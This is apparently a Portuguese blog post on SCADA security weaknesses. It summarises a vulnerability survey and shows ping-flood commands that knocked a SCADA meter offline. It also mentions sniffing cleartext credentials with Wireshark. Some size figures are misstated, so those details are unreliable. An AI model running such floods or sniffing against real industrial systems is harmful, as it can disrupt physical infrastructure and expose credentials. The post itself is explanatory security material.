– root@injetionsec:~#

Vulnerabilidade em Sistema SCADA

11.11.2013 (11:06 am) – Filed under: Scada ::

Pesquisa feita em 2009 usando o modelo isa99 foram achas vulnerabilidades principalmente em rede e operações DMZ,empresa de TI LAN,LAN HMI,controladores em rede LAN e instrumentação,foram reportados mais de 38 mil vulnerabilidades,o modelo permitiu determinar algumas estatisticas sobre onde as vulnerabilidades descobertas na infraestruturas do sistemas SCADA,abaixo vemos o que foi relatado,vejamos abaixo o quadro.

82qhsd

Quase metade das vulnerabilidades encontradas foram em DMZ e nas empresas de TI que administram os sistemas SCADAs,geralmente são essas empresas que ficam a parte por administrar a rede,tornando isso um fato para essas vulnerabilidades,podemos citar exemplo como as configurações em rede DMZ são compartilhadas em aplicações,servidores SMTP,BD,Web,e outros componentes com riscos de malwares e ataques serem feitos,essas pesquisas apontaram que a varios pontos falhos para serem explorados com 16 diferentes categorias de ataques.

8i73r

8764hc

Esses sistemas raramente tem algum registro ou monitoramento de defesa como IDS/IPS ou outro host de evento de registro,então esses sistemas travam com um simples PING na rede,vemos agora alguns teste realizados com ping no host alvo.

ping -f [IP] -s 60 : enviamos um flood com 60 bits de tamanho,onde o medidor ficou off por cerca de 3 mim e depois foi recuperando por contra propria

ping -f [IP] -s 600 : enviamos um flood com 600 bits de tamanho,esse ataque também ficou off e depois de 3 mim foi recuperando por contra propria

ping -f [IP] -s 6000 : enviamos um flood com 6000 bits de tamanho,esse ataque ele caiu por completo e desligou,onde não ouve recuperação,teve que ser reniciado pelo cabo serial para assim voltar voltar a iniciar

ping -f [IP] -s 60000 : enviamos um flood com 6000 bits de tamanho,esse ataque ele caiu por completo e desligou,onde não ouve recuperação,teve que ser reniciado pelo cabo serial para assim voltar voltar a iniciar

Podemos usar sniffer como Wireshark de rede para analisarmos os protocolos, onde encontrado nomes de usuarios e senhas claro na rede como a imagem abaixo:

(61)

 

Até o próximo tópico galera =)